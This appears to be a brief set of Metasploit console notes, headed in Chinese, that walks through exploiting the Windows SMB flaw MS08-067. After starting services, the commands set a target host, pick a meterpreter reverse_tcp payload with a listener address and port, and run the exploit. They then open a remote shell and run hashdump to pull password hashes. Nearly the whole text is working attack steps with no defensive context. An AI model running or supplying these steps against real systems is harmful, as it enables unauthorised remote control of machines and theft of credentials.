使用終端機指令 msfconsole
/etc/init.d/mysqld start
/etc/init.d/metasploit start
msfconsole
search
search ms08-067
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > info
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 172.....
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set LHOST 172...
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set LPORT 53...
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > exploit
msf exploit(ms08_067_netapi) > ?
msf exploit(ms08_067_netapi) > shell
hashdump
msf exploit(ms08_067_netapi) > back
msf >
msf > exit